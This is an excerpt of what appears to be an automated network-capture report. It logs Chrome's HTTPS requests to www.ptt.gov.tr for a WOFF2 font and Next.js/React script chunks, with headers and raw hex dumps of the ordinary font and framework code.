                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:40 UTC351INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: font/woff2
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"1ca7c-191e5a7dff0"
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:40 GMT
                                                                                                                                                                                            Content-Length: 117372
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:40 UTC6920INData Raw: 77 4f 46 32 00 01 00 00 00 01 ca 7c 00 0a 00 00 00 03 14 3d 00 01 ca 31 03 05 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 90 54 00 a5 7e ca 8b d6 7c cb 90 58 05 88 1d 07 20 25 1e 8a 71 eb 80 d4 e0 3c 00 00 d4 d6 9f 07 65 44 d6 69 7b 00 54 55 55 6f 09 c1 dd ab f6 1f 20 fc f4 cb 6f 7f f8 d3 5f fe f6 8f 7f fd e7 7f 7f 19 18 bb 03 62 d9 8e eb f9 86 ff af fd b2 f3 ee cc 0f 30 bb d8 85 5e 20 76 04 6a 75 2f d8 65 61 22 64 54 2a b2 cb 4f f9 95 80 2e 08 6f 09 37 cb 60 a2 d7 89 02 2f ea bc 9a f3 22 e6 65 d2 17 23 c9 95 32 85 07 a8 3f b1 f7 eb 60 0a 43 2b f0 04 38 55 16 ca 1c 2e 4b 20 e6 22 47 07 00 cf 12 23 44 76 36 2d ff df 3b ad fe de 12 94 4a aa 92 2d 0b ca 10 b0 ad 58 0a 50 59 b1 94 b8 c9 9d 4e 0f 60 86 e8 c4 fb
                                                                                                                                                                                            Data Ascii: wOF2|=16$ `T~|X %q<eDi{TUUo o_b0^ vju/ea"dT*O.o7`/"e#2?`C+8U.K "G#Dv6-;J-XPYN`
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: 8c be ee ba 5f 9f fe 5b 05 bc b4 b0 20 fb d7 38 c2 b7 c0 d2 d7 21 54 9e 4d 61 e7 b3 a5 78 de d5 30 2c 21 3d cf 91 20 2c 4d bf bb bc 0e 7f df 2c 4f bf 8c cb 97 77 89 e9 28 b2 cc 12 5e 98 fe f9 e5 2e 46 16 0e eb 44 0b 87 3d ed 47 36 a0 ea 09 14 f1 b9 d2 a4 2e 11 a1 80 8f 37 24 4f d6 3a 9d 28 0c a3 4e 67 6d e9 f9 9f e0 fc c2 4e ef dc b9 de ce c2 3c be af 1b 86 51 27 59 5d 4d f6 93 9f 1b 19 5f c8 b2 c5 85 85 c5 2c bb f0 50 f0 dd de dd 18 16 61 93 27 48 99 03 51 c5 07 f4 64 16 67 6e bb 0d a9 c2 c8 6b 3b 6c a9 95 c1 70 38 0c a6 d8 21 51 98 81 61 86 61 eb 64 32 38 dc a4 9d e2 cf e3 17 fa 59 32 00 28 e2 c3 f7 92 79 11 2f 20 bb f7 4c 6a 52 63 28 0e 82 e5 11 69 52 a9 20 f3 f1 a4 03 b2 b1 71 b0 1e df 64 21 3a b6 10 ec c6 c5 4a bc 0d d6 7a 07 ff 04 08 5b bd ed ed fd
                                                                                                                                                                                            Data Ascii: _[ 8!TMax0,!= ,M,Ow(^.FD=G6.7$O:(NgmN<Q'Y]M_,Pa'HQdgnk;lp8!Qaad28Y2(y/ LjRc(iR qd!:Jz[
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: d2 a2 0e bb cb 2b 8d a7 ac ae ae fe cb b3 ee 5d bb f6 da 6b 05 63 98 1e 7b d3 73 9e f3 1c 08 b5 e0 f4 e6 7b 88 d8 fb c9 de 15 94 70 85 9c 27 af 24 df 85 3a 1c 80 bb 09 49 13 29 a4 28 b0 e8 b1 d5 24 9d 94 93 34 99 26 69 14 e5 01 9d 50 d8 a0 1a b1 b3 ab cb 7c e3 83 16 cf ce 65 ba 4b 9f 9a 6d 54 e0 d9 bd 34 92 51 f6 d4 61 1f ad f8 2e 76 7a d4 5e 22 23 59 fa e0 eb dc c0 0b 66 51 32 2e f2 39 c7 12 a6 b3 23 b3 e9 62 ba c8 05 5a 8e f2 41 36 28 f2 2c 9f 0f e6 79 31 46 b8 7e 5c 49 43 99 bf e5 7c 3e 2b 23 50 70 0f a8 c9 cc af 78 ae f9 2c 8f 56 81 76 a6 5b e4 c5 40 5f f6 55 fe 7c a7 8b 6a 32 2d 55 43 5c eb 6d 95 58 cb c4 72 de 2c 65 37 3d 4c 8f 1d 8d 63 69 29 d7 9f 4a 21 cb df 66 dd e4 d9 dd fb 76 0c f3 cc 55 f7 f6 4b c6 00 20 d4 01 91 22 af b2 1c 70 03 90 52 40 0a
                                                                                                                                                                                            Data Ascii: +]kc{s{p'$:I)($4&iP|eKmT4Qa.vz^"#YfQ2.9#bZA6(,y1F~\IC|>+#Ppx,Vv[@_U|j2-UC\mXr,e7=Lci)J!fvUK "pR@
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: 73 f3 d4 ce fa 5a a0 2a 8a d9 01 63 5d 61 16 a4 85 0c 52 40 34 cc 96 5d 00 d4 db 63 44 a9 8d 34 60 bc 92 6f ec c7 48 e0 31 b2 9f 10 48 e2 b2 1c 8b 19 97 80 40 dd 64 3a a9 3a 07 51 92 12 9b a3 24 e5 f3 15 04 cd 35 83 ff 01 d9 e0 f8 b1 7b ef 38 6d d9 57 ef 0c 1b 0d 43 1b ae 3d 4a 53 88 1b 1b 14 9c 62 a7 3a 86 d0 ee 6c 6c 77 86 5d bb df 6d 27 5d 58 91 e2 f4 08 2b f5 6d 01 6c 40 14 75 81 aa 56 ab 40 0b bb fb da b5 71 bb cd 2c 6b a3 d3 01 e8 c9 60 14 33 bb 97 b6 f3 fa 6d 8c b3 7d 80 10 5f a0 b0 80 0c 69 7d 7c 03 a5 c8 83 2d aa 45 55 22 19 27 ea ed e2 7c 71 f3 eb 5d ee 3d 72 04 af 0c 29 f5 6e ee 3c 7e 3c fd f4 9f e4 0b ce a9 53 1f 7e c4 ac 8a 90 bd df 86 1f c3 d7 89 22 3e 69 90 9f 22 6f 20 ef 20 ef 27 1f 21 a4 12 d9 c0 41 ba 40 a8 3c 41 c4 c9 74 31 cf b3 0e 1d
                                                                                                                                                                                            Data Ascii: sZ*c]aR@4]cD4`oH1H@d::Q$5{8mWC=JSb:llw]m']X+ml@uV@q,k`3m}_i}|-EU"'|q]=r)n<~<S~">i"o '!A@<At1
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 76 28 91 8b e9 c2 73 aa 1d 97 f3 2c 8c 71 36 2f ed 6d b6 82 66 cb e6 72 20 13 99 5a 0a 5d 62 04 a4 be 17 c4 68 ec 3c 02 b6 25 b2 e1 13 84 14 a9 2c 45 0c e6 26 22 42 40 40 8f c2 02 a0 53 a3 c5 b4 94 28 dc 6c 87 26 f3 c9 3a 85 22 f5 b0 8c e7 71 04 e2 72 91 a6 c5 d6 6f c6 b3 79 3e 17 52 c8 7f e4 9c 73 ce e0 a3 5e bd ee c8 f9 1c 50 68 2d 0a 69 01 e5 c8 05 9a 8e 10 4f dd 34 11 19 73 1d bb 57 ee 93 3e a7 42 f0 a0 13 a8 56 af ab 7e 07 00 0e d4 b2 6c c7 94 4a 81 23 28 37 74 3f 8e 84 1f 22 f8 5a 2a 08 43 8f d9 b6 69 c2 5c 83 c9 1c c7 e4 48 0d 4a 11 91 29 21 c5 5b 34 98 a2 d7 eb 0f 0c 00 64 4e 68 9b 96 0c e3 c8 e4 8a 7a 16 02 d4 6a 8e 8b 20 41 0a 07 8b 79 3f 00 1d b9 8e e4 4a fb 9e 3f ea 23 46 be ef 7e c7 a2 d7 d5 6a b5 a4 77 1a 11 91 3b 41 00 50 73 b5 f9 df 29 02
                                                                                                                                                                                            Data Ascii: v(s,q6/mfr Z]bh<%,E&"B@@S(l&:"qroy>Rs^Ph-iO4sW>BV~lJ#(7t?"Z*Ci\HJ)![4dNhzj Ay?J?#F~jw;APs)
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: cb c0 33 0c c8 9a 57 31 a5 e4 b0 8b 52 1b 6c 63 f8 b0 fe aa 40 66 5d 94 51 a4 02 f9 6c 15 fd dc a9 53 a7 78 1a b9 6e bd e1 79 00 8e d3 a8 db f6 9f 41 ad 06 08 62 2e 00 bb 5d fa ab 10 69 b0 af ff b5 00 d0 03 13 b4 66 4c 29 bf 00 31 d0 a0 34 65 4a 85 3b 13 17 db cc 30 bc e7 a9 6e 1f 41 dd fc a8 69 02 e0 a3 8f 06 52 ca 96 fa 1c a8 55 f9 31 ad d1 f3 bb 7d cf 9b a6 a8 da da f3 7a ad 20 0c 83 96 14 04 87 77 07 52 22 81 1b c9 8d 84 54 45 5a f8 ea d2 47 4a 9a e9 a2 d2 a0 67 84 e6 fc 58 ce ab ca 5c d2 33 21 46 8e 79 24 6b 3b 1a 5f ff 9b ca 9f 86 61 18 47 59 37 0c 21 4e 5a 6b 61 e0 50 6e 0d b2 ab aa 7e 1f b0 db 2b b8 18 52 58 59 63 07 8c 0b 6b 9d 2e e2 29 2d db be 0f 70 70 23 49 0c 46 fd 4e fb ba a3 fd 01 be a2 ac d7 6e 9c 4e a7 e8 ba 58 af ad 2d 92 14 da ed a9 e5
                                                                                                                                                                                            Data Ascii: 3W1Rlc@f]QlSxnyAb.]ifL)14eJ;0nAiRU1}z wR"TEZGJgX\3!Fy$k;_aGY7!NZkaPn~+RXYck.)-pp#IFNnNX-
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 01 d0 29 06 49 d7 62 dd 4a 27 3a d5 09 49 6a 05 2d d3 20 b2 0c 98 31 cb f2 7d c7 76 f7 cc cc ea 16 16 2a ad f9 56 9f 5b 96 b3 b0 22 60 01 5f 38 bf 00 cd d6 dc dc 99 9c 23 84 30 42 3b 5f 80 7f c2 69 94 a2 3d 08 01 e3 79 ce b4 d5 47 06 fd 82 f1 ea 97 b2 d5 b1 83 dc f3 d3 d8 46 d3 a1 71 d4 a4 24 bc 7c c6 61 e1 d8 60 48 e9 a0 92 26 d3 45 f7 8c cb 18 5b 19 8f ea 75 a1 7a 8f e1 b2 d5 6e 71 75 a3 15 d7 a7 a2 28 8a a6 1a ad b8 31 2a 59 96 35 82 d7 08 8b 8b e7 9e 77 66 cb 75 6a 4b 98 b4 9a 45 b1 2a 8e 3f 19 61 b1 b6 7d 9b 0d e0 95 7a b3 7b f7 ce f6 4a 2e 06 7b b0 b2 b2 77 a5 ef ef b5 fe 01 2c c0 a7 d0 10 ed 45 3f 68 c1 38 7f 0c c2 01 24 cb 1e 7d 4b 68 c3 45 86 4c 17 5b 2e b4 d9 35 32 89 19 a6 98 3e 52 dc ed a3 f1 b8 21 91 f6 6a 0a 3f 96 18 9b 2b 2e 3f b2 b2 ea fa
                                                                                                                                                                                            Data Ascii: )IbJ':Ij- 1}v*V["`_8#0B;_i=yGFq$|a`H&E[uznqu(1*Y5wfujKE*?a}z{J.{w,E?h8$}KhEL[.52>R!j?+.?
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 28 3a 00 ca 34 bd 40 08 73 43 2a a9 24 67 ce 23 27 77 76 fa 97 ff fd b4 ee 30 ca 03 ad b8 00 e5 19 42 3a ed 5a 10 50 6c 75 92 58 81 52 7e e4 79 9a 0a 00 60 26 22 98 a6 b6 c0 6c 34 6a 4c 98 69 8d ea 5a 2d e1 94 72 cb d0 c2 0e a0 6a 3e 95 e0 79 34 0d b4 eb c5 36 e7 94 f9 cd 66 0b 94 94 5e 18 19 a2 5e cb 86 2d 2f 08 ec 24 8a a4 f0 ea 02 f6 12 a6 f8 01 c4 1b 41 28 da 78 31 5f 04 c4 a0 28 a8 3b 2f 27 53 ad 56 ec 7c e0 fe 60 1d 29 ce ca 41 36 ad b4 79 3e 69 5a 8a 58 c8 28 c6 5c 98 e4 c5 a4 60 4d 82 59 d6 67 ab 45 35 85 4b 50 35 ac 7e eb 2d b7 3c 5b c9 ba 69 00 a0 a1 9b 52 21 5d d9 dd 3d 71 62 81 ad a6 4a 8a 20 4d a3 f6 46 9b de 0a a1 10 02 68 c3 ec 61 0e 0d 04 26 45 04 51 38 d9 bc 7d d5 f3 3c ce 93 fb 65 b3 d9 6e db 14 58 1d 81 09 e1 e7 07 0f 1e 3e b4 1a 70 c1
                                                                                                                                                                                            Data Ascii: (:4@sC*$g#'wv0B:ZPluXR~y`&"l4jLiZ-rj>y46f^^-/$A(x1_(;/'SV|`)A6y>iZX(\`MYgE5KP5~-<[iR!]=qbJ MFha&EQ8}<enX>p
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 36 b8 9e eb 22 f8 33 d7 30 61 a0 5e ab 0d f7 29 12 b2 fb 24 a8 5d 90 52 af 48 50 fd 46 18 c2 55 c0 3b 82 23 05 c3 0e 2c c7 34 a1 b5 e2 98 26 80 11 13 52 f6 d0 86 e0 3e 0c 52 e5 d4 09 c3 3b 57 fe 3b 24 a3 4e 90 78 21 22 b3 07 64 65 51 4e 73 eb 7c 89 f6 71 ce 9f ff 1c fb be a7 88 92 ce 17 ec 63 ec 61 f9 32 f1 f7 bf 5f c6 0d db db db 93 9f 6e b7 af ca 1d ef 10 6c 6d d3 6d 9b c6 63 1f 87 cf c3 d7 c9 5a 8b 38 cc 74 4b c9 86 92 e1 76 c2 5c 02 88 e1 3b 03 b7 39 8d 46 a7 7b fa f9 75 da 1b 9d 46 c3 89 8e 0f b6 b7 ab 66 eb cb 50 6d 6f 0f 8e 47 6f ab b9 2e 74 da 1b 1b ed 0e b8 6e fd fa 22 8f 93 66 ed 55 49 e2 bc b8 8e 08 92 ec fd 12 ae c1 b7 c9 41 f2 61 f2 d7 70 2f d6 b0 4d 48 98 57 51 ba a8 d2 6d 93 8a 1a eb 81 ed 3c 9b 35 0e c5 5d fb e4 28 16 e9 24 1e 97 83 78 5c
                                                                                                                                                                                            Data Ascii: 6"30a^)$]RHPFU;#,4&R>R;W;$Nx!"deQNs|qca2_nlmmcZ8tKv\;9F{uFfPmoGo.tn"fUIAap/MHWQm<5]($x\
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 59 35 b4 52 dd 3d cc e9 24 81 59 06 1a c5 a4 28 5a 6b 47 0e f1 6e 59 3d cf af b6 e8 8f 4c 5d cd 16 eb 46 35 71 cf cb a2 94 f0 53 67 5f 03 6f 38 fb 1a 96 67 fd 5e 9e 71 78 23 65 59 b7 97 a5 6c e6 05 67 c4 85 6f 31 5e 31 16 31 ce 3f 59 1b dc e7 35 94 2f c5 81 b3 88 b1 8a b3 d6 e2 79 01 1c c1 68 0e 8c e3 4c 2d 00 99 17 82 98 10 be 60 54 10 02 47 a1 b5 6e b4 ff 1c a9 0c b1 0f b4 16 c8 01 29 67 c8 b9 f7 42 30 12 c2 33 04 e1 94 02 04 2e 18 09 04 0e 02 6e f5 b3 9c 9d 7d 0d cb d2 5e 2f cb 18 bc 9e e7 59 ef ec 75 6f 68 6a 62 c8 09 11 4c b7 db f1 c6 20 1a e3 3b dd ae 61 7b d0 48 b1 c1 26 e2 58 a7 fa fd 2b af 8a a5 20 e4 d8 91 4a 81 31 04 a9 2a 23 2b eb 9b 18 05 56 5e 19 5b 49 53 29 49 ac 02 97 2d e5 48 42 c6 af bc da ef 2b c9 e5 4e cc 38 b4 67 df f7 2d f8 13 b8 15
                                                                                                                                                                                            Data Ascii: Y5R=$Y(ZkGnY=L]F5qSg_o8g^qx#eYlgo1^11?Y5/yhL-`TGn)gB03.n}^/YuohjbL ;a{H&X+ J1*#+V^[IS)I-HB+N8g-


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            121192.168.2.549849185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:40 UTC602OUTGET /_next/static/chunks/webpack-45e080b2c6cac5da.js HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:40 UTC398INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"102b-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:40 GMT
                                                                                                                                                                                            Content-Length: 4139
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:40 UTC4139INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 7d 2c 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 76 61 72 20 6f 3d 74 5b 72 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 29 72 65 74 75 72 6e 20 6f 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 75 3d 74 5b 72 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 69 3d 21 30 3b 74 72 79 7b 65 5b 72 5d 2e 63 61 6c 6c 28 75 2e 65 78 70 6f 72 74 73 2c 75 2c 75 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 3d 21 31 7d 66 69 6e 61 6c 6c 79 7b 69 26 26 64 65 6c 65 74 65 20 74 5b 72 5d 7d 72 65 74 75 72 6e 20 75 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 6e 2e 4f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6f 2c 75 29
                                                                                                                                                                                            Data Ascii: !function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var u=t[r]={exports:{}},i=!0;try{e[r].call(u.exports,u,u.exports,n),i=!1}finally{i&&delete t[r]}return u.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,u)


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            122192.168.2.549848185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:40 UTC604OUTGET /_next/static/chunks/framework-0438cefc59f69f60.js HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:40 UTC401INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"226bf-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:40 GMT
                                                                                                                                                                                            Content-Length: 140991
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:40 UTC6870INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 37 37 34 5d 2c 7b 32 37 36 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 72 3d 74 28 32 34 36 36 29 2c 6c 3d 74 28 31 30 36 32 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 6a 73 2e 6f 72 67 2f 64 6f 63 73 2f 65 72 72 6f 72 2d 64 65 63 6f 64 65 72 2e 68 74 6d 6c 3f 69 6e 76 61 72 69 61 6e 74 3d 22 2b 65 2c 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 6e 2b 3d 22 26 61 72 67 73 5b 5d 3d 22 2b 65 6e 63 6f 64 65 55 52 49
                                                                                                                                                                                            Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{2760:function(e,n,t){var r=t(2466),l=t(1062);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURI
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: 22 5c 6e 22 29 2c 6f 3d 6c 2e 6c 65 6e 67 74 68 2d 31 2c 75 3d 61 2e 6c 65 6e 67 74 68 2d 31 3b 31 3c 3d 6f 26 26 30 3c 3d 75 26 26 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 3b 29 75 2d 2d 3b 66 6f 72 28 3b 31 3c 3d 6f 26 26 30 3c 3d 75 3b 6f 2d 2d 2c 75 2d 2d 29 69 66 28 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 29 7b 69 66 28 31 21 3d 3d 6f 7c 7c 31 21 3d 3d 75 29 64 6f 7b 69 66 28 6f 2d 2d 2c 30 3e 2d 2d 75 7c 7c 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 29 7b 76 61 72 20 69 3d 22 5c 6e 22 2b 6c 5b 6f 5d 2e 72 65 70 6c 61 63 65 28 22 20 61 74 20 6e 65 77 20 22 2c 22 20 61 74 20 22 29 3b 72 65 74 75 72 6e 20 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 26 26 69 2e 69 6e 63 6c 75 64 65 73 28 22 3c 61 6e 6f 6e 79 6d 6f 75 73 3e 22 29 26 26 28 69 3d 69 2e 72 65 70 6c 61 63 65 28 22 3c 61
                                                                                                                                                                                            Data Ascii: "\n"),o=l.length-1,u=a.length-1;1<=o&&0<=u&&l[o]!==a[u];)u--;for(;1<=o&&0<=u;o--,u--)if(l[o]!==a[u]){if(1!==o||1!==u)do{if(o--,0>--u||l[o]!==a[u]){var i="\n"+l[o].replace(" at new "," at ");return e.displayName&&i.includes("<anonymous>")&&(i=i.replace("<a
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: 61 79 3a 21 30 2c 73 74 72 6f 6b 65 44 61 73 68 6f 66 66 73 65 74 3a 21 30 2c 73 74 72 6f 6b 65 4d 69 74 65 72 6c 69 6d 69 74 3a 21 30 2c 73 74 72 6f 6b 65 4f 70 61 63 69 74 79 3a 21 30 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 21 30 7d 2c 6d 65 3d 5b 22 57 65 62 6b 69 74 22 2c 22 6d 73 22 2c 22 4d 6f 7a 22 2c 22 4f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 68 65 28 65 2c 6e 2c 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 7c 7c 22 62 6f 6f 6c 65 61 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 6e 7c 7c 22 22 3d 3d 3d 6e 3f 22 22 3a 74 7c 7c 22 6e 75 6d 62 65 72 22 21 3d 3d 74 79 70 65 6f 66 20 6e 7c 7c 30 3d 3d 3d 6e 7c 7c 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 70 65 5b 65 5d 3f 28 22 22 2b 6e 29 2e 74 72 69 6d 28 29 3a 6e 2b 22 70 78 22 7d
                                                                                                                                                                                            Data Ascii: ay:!0,strokeDashoffset:!0,strokeMiterlimit:!0,strokeOpacity:!0,strokeWidth:!0},me=["Webkit","ms","Moz","O"];function he(e,n,t){return null==n||"boolean"===typeof n||""===n?"":t||"number"!==typeof n||0===n||pe.hasOwnProperty(e)&&pe[e]?(""+n).trim():n+"px"}
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: 72 2c 6e 3d 65 2e 74 61 72 67 65 74 43 6f 6e 74 61 69 6e 65 72 73 2c 6e 75 6c 6c 21 3d 3d 6c 26 26 2d 31 3d 3d 3d 6e 2e 69 6e 64 65 78 4f 66 28 6c 29 26 26 6e 2e 70 75 73 68 28 6c 29 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 55 6e 28 65 29 7b 76 61 72 20 6e 3d 79 6c 28 65 2e 74 61 72 67 65 74 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6e 29 7b 76 61 72 20 74 3d 6a 65 28 6e 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 74 29 69 66 28 31 33 3d 3d 3d 28 6e 3d 74 2e 74 61 67 29 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 28 6e 3d 42 65 28 74 29 29 29 72 65 74 75 72 6e 20 65 2e 62 6c 6f 63 6b 65 64 4f 6e 3d 6e 2c 76 6f 69 64 20 43 6e 28 65 2e 70 72 69 6f 72 69 74 79 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 45 6e 28 74 29 7d 29 29 7d 65 6c 73 65 20 69 66 28 33 3d 3d 3d 6e 26 26 74 2e 73 74
                                                                                                                                                                                            Data Ascii: r,n=e.targetContainers,null!==l&&-1===n.indexOf(l)&&n.push(l),e)}function Un(e){var n=yl(e.target);if(null!==n){var t=je(n);if(null!==t)if(13===(n=t.tag)){if(null!==(n=Be(t)))return e.blockedOn=n,void Cn(e.priority,(function(){En(t)}))}else if(3===n&&t.st
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: 43 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 6b 65 79 64 6f 77 6e 22 3d 3d 3d 65 2e 74 79 70 65 7c 7c 22 6b 65 79 75 70 22 3d 3d 3d 65 2e 74 79 70 65 3f 65 2e 6b 65 79 43 6f 64 65 3a 30 7d 2c 77 68 69 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 6b 65 79 70 72 65 73 73 22 3d 3d 3d 65 2e 74 79 70 65 3f 74 74 28 65 29 3a 22 6b 65 79 64 6f 77 6e 22 3d 3d 3d 65 2e 74 79 70 65 7c 7c 22 6b 65 79 75 70 22 3d 3d 3d 65 2e 74 79 70 65 3f 65 2e 6b 65 79 43 6f 64 65 3a 30 7d 7d 29 2c 50 74 3d 61 74 28 43 74 29 2c 4e 74 3d 61 74 28 49 28 7b 7d 2c 70 74 2c 7b 70 6f 69 6e 74 65 72 49 64 3a 30 2c 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 2c 70 72 65 73 73 75 72 65 3a 30 2c 74 61 6e 67 65 6e 74 69 61 6c 50 72 65 73 73
